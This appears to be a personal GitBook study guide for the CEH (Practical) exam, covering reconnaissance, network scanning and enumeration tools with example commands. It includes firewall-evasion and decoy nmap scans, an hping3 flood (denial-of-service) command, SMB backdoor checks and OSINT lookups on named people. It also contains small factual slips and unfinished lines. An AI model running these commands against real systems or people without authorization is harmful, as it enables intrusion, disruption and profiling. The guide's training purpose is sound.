# About the Author

Welcome to the Book of Guru HariHaraun. Here, I share and document all my write-ups, which might help others in the information security community.

## Introduction About Me

Hey There!👋🏻 I'm [<mark style="color:purple;">**Guru HariHaraun.**</mark>](https://thegurusec.com) Information Security Professional Student and Certified Ethical Hacker with 3+ years of research experience in Penetration Testing(Red Team), withholding a Bachelor of Engineering degree focused in Computer Science. Also, I am a Cloud Engineering Aspirant, a Full-Stack Developer, and an SEO Strategist.

## About This Book

This is my book where I share and document all my write-ups, which might help others in the information security community. As everyone knows, contributing to the community gives you knowledge and power! 🔥and I go it with all grant😎&#x20;

## Contact Me

<table><thead><tr><th width="211.78309008555618">Platform</th><th width="357.3333333333333">Links</th></tr></thead><tbody><tr><td><strong>Web</strong></td><td><a href="https://thegurusec.com"><strong>https://thegurusec.com</strong></a></td></tr><tr><td><strong>Linkedin</strong></td><td><a href="https://www.linkedin.com/in/guru-hariharaun"><strong>https://www.linkedin.com/in/guru-hariharaun</strong></a></td></tr><tr><td><strong>Medium</strong></td><td><a href="https://thegurusec.medium.com/"><strong>https://thegurusec.medium.com/</strong></a></td></tr><tr><td><strong>Github</strong></td><td><a href="https://github.com/guruhariharaun"><strong>https://github.com/guruhariharaun</strong></a></td></tr><tr><td><strong>Twitter</strong></td><td><a href="https://twitter.com/thegurusec.com"><strong>https://twitter.com/thegurusec</strong></a></td></tr><tr><td><strong>Email</strong></td><td><a href="mailto:mail@"><strong>mail@thegurusec.com</strong></a></td></tr></tbody></table>

## Support Me

#### Hi Again! So I put much effort into doing work for these books since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁

{% embed url="<https://www.buymeacoffee.com/guruhariharaun>" %}


# Certified Ethical Hacker (C|EH)(Practical)

This note will guide you with all my methodologies I used while preparing and throughout the exam.

![Logo of Certified Ethical Hacker (Practical) | C|EH (Practical)](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FfRxKHeGTbcuZFYTmOoyD%2FCEH-Practical-Logo.gif?alt=media\&token=e2a20500-7cbc-4820-841b-dac1de57e2a8)

## Introduction

**Hey there!👋🏻** Welcome to my notes If you are here then you are probably to pass your **Certified Ethical Hacker (Practical)** exam or to get to know about the exam. So this book guides you with all the tools, tricks procedures, notes. I used it in my preparation and during my exam.&#x20;

{% hint style="danger" %}
**Disclaimer:** You can't 100% relay this note for your exam preparation. Since I do have experience with penetration testing I might have skipped a few steps. I tried almost to add all the tools and steps in layman terms, so please get used to it and always google the stuff. Use these notes as your escape mechanism before your exam. All the tools which have mentioned in this guide may not be safe to use since some of the tools are not been maintained by the team. If any issues happen for you or for your computer, I'm not responsible.
{% endhint %}

## My Write-up

You can read my blog on [<mark style="color:red;">**how I cracked CEH (Practical) with a full score on my first attempt**</mark><mark style="color:orange;">**.**</mark>](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) Since I wrote a blog on Medium, I'm not duplicating all my content here on this page, also, it may affect the SEO rank of my website.

{% embed url="<https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac>" %}

## Page of Content&#x20;

{% content-ref url="/pages/UtBEq1n7vnt3zZuzqJTF" %}
[Reconnaissance (Footprinting)](/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting)
{% endcontent-ref %}

{% content-ref url="/pages/vzu3AZXplE54wEtWt7WE" %}
[Scanning Networks](/certifications/certified-ethical-hacker-practical/scanning-networks)
{% endcontent-ref %}

{% content-ref url="/pages/Trye82lw5rPirDIr4F6w" %}
[Enumeration](/certifications/certified-ethical-hacker-practical/enumeration)
{% endcontent-ref %}

{% content-ref url="/pages/GWNyscxbamVDh57A0MsI" %}
[Vulnerability Analysis](/certifications/certified-ethical-hacker-practical/vulnerability-analysis)
{% endcontent-ref %}

{% content-ref url="/pages/w2K2fW6l6CtKi78VUrtr" %}
[System Hacking](/certifications/certified-ethical-hacker-practical/system-hacking)
{% endcontent-ref %}

{% content-ref url="/pages/g3cxEWffxNXSgACG9Tio" %}
[Steganography](/certifications/certified-ethical-hacker-practical/steganography)
{% endcontent-ref %}

{% content-ref url="/pages/2Wr8ClwFx7z1jvKJIyDM" %}
[Sniffing](/certifications/certified-ethical-hacker-practical/sniffing)
{% endcontent-ref %}

{% content-ref url="/pages/0BGGSvXNyODqf1zjgTiK" %}
[SQL Injection](/certifications/certified-ethical-hacker-practical/sql-injection)
{% endcontent-ref %}

{% content-ref url="/pages/qpWevTTIyKbteP1LS7nr" %}
[Hacking Web Applications & Servers](/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers)
{% endcontent-ref %}

{% content-ref url="/pages/9ezQQLviXhj6U4vowhjv" %}
[Cloud Computing](/certifications/certified-ethical-hacker-practical/cloud-computing)
{% endcontent-ref %}

{% content-ref url="/pages/Asdy5MxyLP29K7NHpzbg" %}
[Cryptography](/certifications/certified-ethical-hacker-practical/cryptography)
{% endcontent-ref %}

{% content-ref url="/pages/iOaewN2KFunIswjU9Nd4" %}
[The Final Note](/certifications/certified-ethical-hacker-practical/the-final-note)
{% endcontent-ref %}

## Showcase

### Certificate:

![Certificate of Achievement - Certified Ethical Hacker (Practical)](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2F9R5g2Wtbk22CwknJCgnx%2FECC-CEHPractical-Certificate.png?alt=media\&token=0f85b185-a197-49a3-9d6e-295a362fbb95)

### Digital Badge

You can verify my Digital Badge for authenticity here on the ASPEN portal.&#x20;

{% embed url="<https://aspen.eccouncil.org/VerifyBadge?a=BBDTKAK7dcB7IqnCSdTJc3kMsy5qYBLPzNgp9mAL4mM%3D&type=certification>" %}
Digital Badge of Guru HariHaraun
{% endembed %}

## Support Me

#### Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝

{% embed url="<https://www.buymeacoffee.com/guruhariharaun>" %}
Support me here by buying me a coffee 😁🥰
{% endembed %}


# Reconnaissance (Footprinting)

Welcome to the Footprinting module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Information Gathering using Google Dorks

Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes i the configuration and computer code that websites are using. Google dorking could also be used for OSINT.

{% embed url="<https://www.exploit-db.com/google-hacking-database>" %}
Exploit DB - Google Hacking Database
{% endembed %}

{% file src="/files/xaWiHDLtPJrhmryyQIFe" %}

## Netcraft and Peekyou

* <https://www.netcraft.com> to find the information about the websites
* [www.peekyou.com](http://www.peekyou.com) to find the information about people who live in the USA

## Harvesting Email using theHarvester

theHarvester is a very simple to use, yet powerful and effective tool designed to be used in the early stages of a penetration test or red team engagement. Use it for open-source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet. The tool gathers emails, names, subdomains, IPs and URLs using multiple public data sources.

{% embed url="<https://github.com/laramies/theHarvester>" %}

```
theharvester -d microsoft.com -l 200 -b baidu
```

## Sherlock

* Sherlock is a tool used to Gather information and hunts down social media accounts by username across social networks about the users.

{% embed url="<https://github.com/sherlock-project/sherlock>" %}

```
python3 sherlock.py satoshi nakamoto
```

## Ping

Ping is a computer network administration software utility used to test the reachability of a host on an Internet Protocol network. It is available for virtually all operating systems that have networking capability, including most embedded network administration software

```
ping www.google.com -f -l 1500 -i 3
-f = Fragment the packets
-l = Size of bytes
-i = Number of packets
```

{% hint style="info" %}
The maximum size of the frame is **1472**
{% endhint %}

## Web Data Extractor

* Web Data Extractor is a Windows Tool
* The tool is used to crawl website content like:
  * Meta Tags
  * Emails
  * Phones
  * Etc...

{% embed url="<http://www.webextractor.com>" %}
Official website of the tool
{% endembed %}

![](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FMvbwN16HCxzkG7ZEkE2R%2Fimage.png?alt=media\&token=028467e1-d226-4a92-bd15-74246b04180f)

## HTTrack

* HTTrack is a tool used to mirror a website and use it in offline

{% embed url="<https://www.httrack.com>" %}

## Cwel

* Cwel is a tool used to create a wordlist from a specific website

```
cewl -d -w save_wordlist.txt 2 -m 5 www.example.com
```

## Email Tracker Pro

* Email Tracker Pro is used to track and check the Email Headers.

{% embed url="<http://www.emailtrackerpro.com/download.html>" %}

## Whois Lookup using Domain Tools

* [https://whois.domaintools.com](https://whois.domaintools.com/) is a tool used to lookup the details of a particular domain.
* WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system but is also used for a wider range of other information.

{% embed url="<https://whois.domaintools.com>" %}

## DNS Footprinting

### nslookup

* nslookup is a network administration command-line tool for querying the Domain Name System to obtain the mapping between a domain name and IP address r other DNS records.

![](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2F8zTggFbwIARSfgYs31Vt%2Fimage.png?alt=media\&token=204f9e85-2525-4d98-af20-b2c2dafdd62f)

### DNSrecon

**DNSRecon** is a free and open-source tool or script that is available on GitHub. Dnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language. You must have python language installed in your kali Linux operating system in order to use the script.&#x20;

```
dnsrecon -r 192.168.64.0-192.168.64.225
```

{% embed url="<https://www.geeksforgeeks.org/dnsrecon-a-powerful-dns-enumeration-script>" %}

## TraceRoute

* Traceroute is used to find the path IP to reach the website.
* In computing, traceroute and tracert are computer network diagnostic commands for displaying possible routes and measuring transit delays of packets across an Internet Protocol network.

## Path Analyzer Pro

* Path Analyzer Pro is a tool used to track the Path and it is a GUI windows application

{% embed url="<https://www.pathanalyzer.com>" %}

## Other Tools

* Recon-ng
* Maltego
* OSRFramework

```
OSRFramework Tools

usufy.py -n Mark Zuckerberg -p twitter facebook youtube
domainfy.py -n eccouncil -t all (Gather all the registered domains)
searchfy.py (Gathers info of user on Social networking page)
mailfy.py (Gathers info about email accounts)
phonefy.py (Gathers the series of phones)
```

* FOCA (Best tool to footprint the whole Web server **Must check**)
* Billcypher is a tool used to track down


# Scanning Networks

Welcome to the Scanning Networks module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Host Discovery

Host discovery is usually referred to as '**Ping' scanning using a sonar** analogy. The goal is to send a packet thru to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response.

### Netdiscover

Netdiscover is a discovery tool and is built into Kali Linux 2018.2. Currently in the 03-pre-beta7 version and written by Jaime Penalba, Netdiscover can reform reconnaissance and discovery on both wireless and switched networks using ARP requests.

To launch Netdiscover, type netdiscover –h to view the usage options. Should you only type the netdiscover command by itself, Netdiscover will launch a default scan.)

```
netdiscover -i (network interface name) (example: eth0 or tun0)
netdiscover -i eth0
netdiscover -r 10.10.10.0/24
```

{% hint style="info" %}
**eth0** may differ if you are on a VPN network. Mostly it would be **tun0**
{% endhint %}

* This will help to get all available machines on the network.
* Always make a habit of saving the IP of the machines since we use themin a lot.

### Nmap

We can also use nmap to discover hosts in a given IP subnet.

**Note:** In the upcoming section, you will learn what the nmap is and its uses are. Please refer to the below section.

```
nmap -sn 10.10.1.1-254 -vv -oA nmapHostsOutput
    • -sn -> Disable Port scanning
    • -vv -> verbose mode
    • -0A -> output the results in 3 types of format(nmap, gnmap, xml)
```

## Nmap

### Introduction to Nmap

Nmap **allows you to scan your network and discover not only everything connected to it**, but also a wide variety of information about what's connected, what services each host is operating, and so on. It was created by Gordon Lyon. It supports a large number of scanning techniques, such as UDP, TCP connect (), TCP SYN (half-open), and FTP. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.

### Basic command

```
nmap -p- -sC -sV -O -A -T4 -oA nmapOutputfile 10.10.X.X

    • -p- -> Scans all the ports from 0 to 65535 available on the IP
    • -sC -> Runs default scripts
    • -sV -> version enumeration or service version
    • -O  -> OS enumeration
    • -A  -> Enumerate all the stuff as much as it can
    • -T4 -> fast as time 4 (default is 3)
    • -oA -> store the output on 3 types of format(nmap, gnmap, xml)
```

### Cheatsheet for nmap

This cheat sheet was prepared by <https://www.stationx.net/nmap-cheat-sheet/>. You can also check out the cheatsheet. I've attached the file below👇🏻

{% file src="/files/wKrtGnbMU8xALMMHnvSz" %}
<https://www.stationx.net/nmap-cheat-sheet/>
{% endfile %}

#### Switches in nmap which you might need to know

<table><thead><tr><th width="185.26939394008483" align="center">Switch</th><th width="568.4285714285713">Description</th></tr></thead><tbody><tr><td align="center">-sA</td><td>ACK scan</td></tr><tr><td align="center">-sF</td><td>FIN scan</td></tr><tr><td align="center">-sI</td><td>IDLE scan</td></tr><tr><td align="center">-sL</td><td>DNS scan (list scan)</td></tr><tr><td align="center">-sN</td><td>NULL scan</td></tr><tr><td align="center">-sO</td><td>Protocol scan (tests which IP protocols respond)</td></tr><tr><td align="center">-sP</td><td>Ping scan</td></tr><tr><td align="center">-sR</td><td>RPC scan</td></tr><tr><td align="center">-sS</td><td>SYN scan</td></tr><tr><td align="center">-sT</td><td>TCP connect scan</td></tr><tr><td align="center">-sW</td><td>Window scan</td></tr><tr><td align="center">-sX</td><td>XMAS scan</td></tr><tr><td align="center">-A</td><td>OS detection, version detection, script scanning and traceroute</td></tr><tr><td align="center">-PI</td><td>ICMP ping</td></tr><tr><td align="center">-Po</td><td>No ping</td></tr><tr><td align="center">-PS</td><td>SYN ping</td></tr><tr><td align="center">-PT</td><td>TCP ping</td></tr><tr><td align="center">-oA</td><td>output the results in 3 types of format(nmap, gnmap, xml)</td></tr><tr><td align="center">-oN</td><td>Normal output</td></tr><tr><td align="center">-oX</td><td>XML output</td></tr><tr><td align="center">-T0 through -T2</td><td>Serial scans. T0 is slowest</td></tr><tr><td align="center">-T3 through -T5</td><td>Parallel scans. T3 is slowest</td></tr></tbody></table>

### Port specific NSE scripts

Using NSE we can perform specific enumeration or exploitation on a host.

```
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*
```

### Bypassing Firewall

<table><thead><tr><th width="232.33333333333331">Switch</th><th width="242.5840801265156">Example</th><th>Description</th></tr></thead><tbody><tr><td>-f</td><td>nmap -f 10.10.10.10</td><td></td></tr><tr><td>-g</td><td>nmap -g 80 10.10.10.10</td><td>Port Manipulation</td></tr><tr><td>-mtu</td><td>nmap -mtu 8 10.10.10.10</td><td>Crunching down Packets to 8 Byte</td></tr><tr><td>-D RND</td><td>nmap -D RND:10 10.10.10.10</td><td>Perform Decoy Scan and Generates Random non-reserved IP</td></tr><tr><td></td><td></td><td></td></tr><tr><td>—data 0xdeadbeef</td><td>nmap 10.10.10.10 --data 0xdeadbeef</td><td></td></tr><tr><td>Send the binary data 0's and 1's</td><td></td><td></td></tr><tr><td>--data-string "Ph34r my l33t skills"</td><td>nmap 10.10.10.10 --data-string "Ph34r my l33t skills"</td><td></td></tr><tr><td>Send strings as payload</td><td></td><td></td></tr><tr><td>--data-length 5</td><td></td><td></td></tr><tr><td>nmap --data-length 5 10.10.10.10</td><td></td><td></td></tr><tr><td>--randomize-hosts</td><td>nmap --randomize-hosts 10.10.10.10</td><td></td></tr><tr><td>send request to a IP from Random non-reserved IP</td><td></td><td></td></tr><tr><td>--badsum</td><td>nmap --badsum 10.10.10.10</td><td>Sends Bad or Bongus TCP/USP Checksum</td></tr></tbody></table>

## Zenmap

Zenmap is the official <mark style="color:purple;">**Nmap Security Scanner GUI**</mark>. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

{% embed url="<https://nmap.org/zenmap>" %}
Official Zenmap link
{% endembed %}

{% hint style="info" %}

* <mark style="color:red;">**I strongly recomend**</mark> you to go with [<mark style="color:purple;">**Zenmap**</mark>](#zenmap) for the exam point of view.
* When you started your exam, the first objective you have to do is that start **Zenmap (GUI Version of Nmap)** scan on your windows machine.&#x20;
* The reason is that in <mark style="color:green;">**Parrot OS**</mark> you may find it hard to parse all the IPs because the <mark style="color:green;">**green colour**</mark> with the terminal might overwhelm you. Instead, the [<mark style="color:purple;">**Zenmap GUI**</mark>](#zenmap) would be useful to find out the services, OS running on that IP with a cute User Interface.&#x20;
* **Trust me!💪🏻** this would be the great life-changer of your exam.&#x20;
* I know as a penetration tester working on the terminal is cool 😎 but in the heat of the moment, the browser-based VM would make you tense.
  {% endhint %}

## Angry IP Scanner

* Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has [many other features](https://angryip.org/about/).
* It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies.
* It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well.

![](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2F7nvGwJJ30F4YmAOqS3SS%2Fipscan-win10.png?alt=media\&token=99f46271-b48b-4784-a8b4-57db352acd86)

{% embed url="<https://angryip.org>" %}

## MegaPing

* MegaPing is the ultimate must-have toolkit that provides all essential utilities for Information System specialists, system administrators, IT solution providers or individuals.
* Mega Ping is also a port and service scanning tool which is for Windows.

![https://www.softpedia.com/get/Network-Tools/Network-Monitoring/MegaPing.shtml](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2F4uwZL52HIvetHIy3Q2wX%2FMegaPing.png?alt=media\&token=5103ac30-bc09-448b-8cb0-a59e0f19a559)

## Hping3

* hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.&#x20;
* It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language.
* Hping3 is a python based tool used to scan and flood(DOS) the particular IP.

```
hping3 10.10.10.x --udp --random-source --data 500
hping3 -S 10.10.10.x -p 80 -c 5 (5 TCP packets sent)
hping3 10.10.10.x --flood (PING OF DEATH! Flooding the IP with TCP Packets)
```

{% hint style="success" %}
Later in the upcoming modules you may read have chance to use [**Hping3**](#hping3). But for time being as per my suggestion, use [<mark style="color:purple;">**ZenMap GUI**</mark>](#zenmap) to scan the IP range to get the information or if you are comfortable with CLI go for [**nmap**.](#nmap)
{% endhint %}

## Operating System Discovery

* The Operating System(OS) discovery has **two types** they are:
  * Active Banner Grabbing
  * Passive Banner Grabbing
* By Banner Grabbing the TTL and TCP Window Size of respective IP, we can identify the Operating System that server runs on. Here are the list of Operating System.

<table><thead><tr><th width="269.3333333333333">Operating System (OS)</th><th width="186.50597609561754">Time To Live</th><th>TCP Window Size</th></tr></thead><tbody><tr><td>Linux (Kernel 2.4 and 2.6)</td><td>64</td><td>5840</td></tr><tr><td>Google Linux</td><td>64</td><td>5720</td></tr><tr><td>FreeBSD</td><td>64</td><td>65535</td></tr><tr><td>OpenBSD</td><td>64</td><td>16384</td></tr><tr><td>Windows 95</td><td>32</td><td>8192</td></tr><tr><td>Windows 2000</td><td>128</td><td>16384</td></tr><tr><td>Windows XP</td><td>128</td><td>65535</td></tr><tr><td>Windows 98, Vista and 7 (Server 2008)</td><td>128</td><td>8192</td></tr><tr><td>iOS 12.4 (Cisco Routers)</td><td>255</td><td>4128</td></tr><tr><td>Solaris 7</td><td>255</td><td>8760</td></tr><tr><td>AIX 4.3</td><td>64</td><td>16384</td></tr></tbody></table>

![TTL of this IP is 128 so it might be Windows 98, Vista and 7 (Server 2008)](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2F5ea2xPKdfC0yIn8CthgH%2Fimage.png?alt=media\&token=5540d543-1bed-4b06-a0fb-babf75177f0a)

### Nmap Script

```
nmap --script smb-os-discovery.nse 10.10.10.x
```

## Metasploit

> We can also scan our target using metasploit

#### Init the Metasploit Framework and check the status of database

```
msfdb init
service postgresql start
msfconsole
db status
```

#### Scanning using Nmap inside Metasploit

```
nmap -Pn -sS -A -oX Test 10.10.10/24
db import Test
hosts (Here you will now listed with the Details of the subnets)
services or db_services
```

{% hint style="success" %}
As per my whish i avoided the Nmap scan using Metasploit because it might looks process tedious **as for me** where using [<mark style="color:purple;">**ZenMap GUI**</mark>](#zenmap) or even through [**Nmap CLI**](#nmap) are even much easier you can get the available machine's IP from the IP subnet through [**hostdiscover**](#host-discovery) command.
{% endhint %}


# Enumeration

Welcome to the Enumeration module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

Enumeration is defined as the **process of extracting user names, machine names, network resources, shares, and services from a system**. The gathered information is used to identify the vulnerabilities or weak points in system security and try to exploit them in the system gaining phase.

Enumeration belongs to the first phase of Ethical Hacking, i.e., “Information Gathering”. This is a process where the attacker establishes an active connection with the victim and try to discover as many attack vectors as possible, which can be used to exploit the systems further.

Enumeration can be used to gain information on

* Network shares
* SNMP data, if they are not secured properly
* IP tables
* Usernames of different systems
* Passwords policies lists

Enumerations depend on the services that the systems offer. They can be −

* DNS enumeration
* NTP enumeration
* SNMP enumeration
* Linux/Windows enumeration
* SMB enumeration

## netBIOS

NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network. As strictly an API, NetBIOS is not a networking protocol. There are different types of commands and tools to enumerate netBIOS.

### nbtstat

* Displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local computer and remote computers, and the NetBIOS name cache.
* This command also allows a refresh of the NetBIOS name cache and the names registered with Windows Internet Name Service (WINS). Used without parameters, this command displays Help information.
* This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections.

{% tabs %}
{% tab title="Display All the name" %}

* To display all the NETBIOS name tables of the Remote Windows Computer

```

    nbtstat -a 10.10.10.x
```

{% endtab %}

{% tab title="Display Name Cache" %}

* Display NETBIOS name cache of Windows Computer

```

    nbtstat -c 10.10.10.x
```

{% endtab %}

{% tab title="use" %}

* use the NETBIOS share on Windows Computer

  ```
  ```

```
net use
```

{% endtab %}
{% endtabs %}

{% embed url="<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat>" %}
Official Microsoft Documentation on nbtstat
{% endembed %}

<table><thead><tr><th width="163.1580108073753">Code</th><th width="222.8410794478056">Type</th><th>Meaning</th></tr></thead><tbody><tr><td>&#x3C;1B></td><td>UNIQUE</td><td>Domain master browser</td></tr><tr><td>&#x3C;1C></td><td>UNIQUE</td><td>Domain controller</td></tr><tr><td>&#x3C;1D></td><td>GROUP</td><td>Master browser for subnet</td></tr><tr><td>&#x3C;00></td><td>UNIQUE</td><td>Hostname</td></tr><tr><td>&#x3C;00></td><td>GROUP</td><td>Domain name</td></tr><tr><td>&#x3C;03></td><td>UNIQUE</td><td>Service running on system</td></tr><tr><td>&#x3C;20></td><td>UNIQUE</td><td>Server service running</td></tr></tbody></table>

### NETBIOS Enumerator

* NetBIOS Enumerator tool is a **GUI based windows tool** used to enumerate the information of the windows remote machine
* Pass the IP range to scan and then the work starts

![http://nbtenum.sourceforge.net/](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FhOqY6CVs7QHeNFdCDmfb%2FnetBIOS_Enumerator.gif?alt=media\&token=e5d2d7c4-53b7-4cf4-ac4c-541941d67101)

{% embed url="<http://nbtenum.sourceforge.net>" %}

### Nmap

{% hint style="info" %}
Port **137** is utilized by the **NetBIOS Name service**.&#x20;

Port **139** is used by **SMB** dialects that communicate over NetBIOS.
{% endhint %}

```
nmap -sV -v --script nbstat.nse 10.10.10.10
nmap -sU -p 137 --script nbstat.nse 10.10.10.10
```

## SNMP

Simple Network Management Protocol (SNMP) is **a networking protocol used for the management and monitoring of network-connected devices in Internet Protocol networks**. It is an application layer protocol in the OSI model framework. Typically, the SNMP protocol is implemented using the User Datagram Protocol (UDP).

{% hint style="info" %}
**Simple Network Management Protocol (SNMP)** lives on Port number: **161**
{% endhint %}

### **snmp-check**

* snmp-check is a tool used to check whether the respective server is vulnerable to SNMP Attacks.
* If the server is vulnerable then the snmp-check enumerate the information of that machine.

```
snmp-check 10.10.10.x
```

{% embed url="<https://www.kali.org/tools/snmpcheck>" %}

### SoftPerfect Network Scanner

* SNMP SoftPacket Network Scanner is a GUI based windows tool.
* Steps to initialize:
  * Click options menu → Remote SNMP→ Mark All/None.
  * Pass the IPV4 Range on the input field and start scanning.

![https://www.softperfect.com/products/networkscanner/](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FbKvIkNLHbzsJn9h5ov25%2FsoftPerfect%20Network%20Scanner.png?alt=media\&token=664ebe1b-30ff-4f25-b2e1-49422f1aabe6)

{% embed url="<https://www.softperfect.com/products/networkscanner>" %}

## LDAP

LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol used for directory services authentication. Directory services store the users, passwords, and computer accounts, and share that information with other entities on the network.

{% hint style="info" %}
**Lightweight Directory Access Protocol (LDAP)** lives on Port number: **389**
{% endhint %}

{% hint style="info" %}
**Lightweight Directory Access Protocol / Secure (LDAP/S)** lives on Port number: **636**
{% endhint %}

### AD Explorer

* AD Explorer is a Windows tool used to enumerate a domain that has LDAP misconfiguration.
* Use this tool to get the data of the Active Directory.

> **Active Directory Explorer (AD Explorer)** is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.

![https://www.zubairalexander.com/blog/active-directory-explorer/](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FUrTpBcIRHl2dN3u2uCmo%2FADExplorer-860x520.png?alt=media\&token=652111cf-1793-4717-b074-b20d1562c474)

{% embed url="<https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer>" %}
Official Microsoft Link for the tool
{% endembed %}

## NFS

**The Network File System (NFS)** is a **mechanism for storing files on a network**. It is a distributed file system that allows users to access files and directories located on remote computers and treat those files and directories as if they were local.

{% hint style="info" %}
**Network File System (NFS)** runs on port number: **2049**
{% endhint %}

### Nmap Script

```
nmap -p 2049 10.10.10.x
```

### SuperEnum

* Super Enum is a Linux based tool
* **Steps:**
  * Create a file "Target.txt" and add the target IP address.
  * Run script

### RPC Scan

* Tool to communicate with RPC services and check misconfigurations on NFS shares
* RPC Scan is a Linux based tool

```
python3 rpc-scan.py 10.10.10.19 --rpc
```

{% embed url="<https://github.com/hegusung/RPCScan>" %}

## DNS

DNS, or the Domain Name System, translates human-readable domain names (for example, [www.google.com](http://www.google.com)) to machine-readable IP addresses (for example, 142.251.42.68).

* A few example tools for DNS Enumeration are:
  * Dig
  * nslookup
  * dnsrecon

## RPC

In distributed computing, a remote procedure call is when a computer program causes a procedure to execute in a different address space, which is coded as if it were a normal procedure call, without the programmer explicitly coding the details for the remote interaction.

{% hint style="info" %}
**Remote Procedure Calls (RPC)** lives on port number: **111**
{% endhint %}

## **SMB**

In computer networking, Server Message Block, one version of which was also known as Common Internet File System, is a communication protocol for providing shared access to files and printers between nodes on a network. It also provides an authenticated inter-process communication mechanism.

{% hint style="info" %}
**Simple Message Block (SMB)** lives on port number: **139, 445**
{% endhint %}

### Nmap Scripts

```
nmap -p 445 --script smb-enum 10.10.10.x
nmap -p 139 --script smb-enum-shares 10.10.10.x
nmap -p 139 --script smb-double-pulsar-backdoor 10.10.10.X
```

### SMBMap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

{% embed url="<https://github.com/ShawnDEvans/smbmap>" %}

```
smbmap -R tmp -H 10.10.10.x
```

### SMBClient

smbclient is **a client that can 'talk' to an SMB/CIFS server**. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

```
smbclient -L \\192.168.29.49
```

{% embed url="<https://www.computerhope.com/unix/smbclien.htm>" %}

{% hint style="success" %}
My suggestion is to use Nmap to discover the SMP, RPC, FTP&#x20;
{% endhint %}

## Global Network Inventory

Global Network Inventory is a **powerful and flexible software and hardware inventory system** that can be used as an audit scanner in an agent-free and zero deployment environment. Global Network Inventory can audit remote computers and even network appliances, including switches, network printers, document centers, etc.

This tool is a GUI based windows tool that has the ability to enumerate lots of information and display it to us.

{% hint style="success" %}
If you are done with all the tools and have no clue about the target then go with this tool.
{% endhint %}

![https://global-network-inventory.windows10compatible.com/](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FA2OvcJuVfUrD2ycy2t3s%2FGNI.png?alt=media\&token=624da4bc-462f-4d0c-96b7-12d7659922dc)

{% embed url="<https://global-network-inventory.windows10compatible.com>" %}

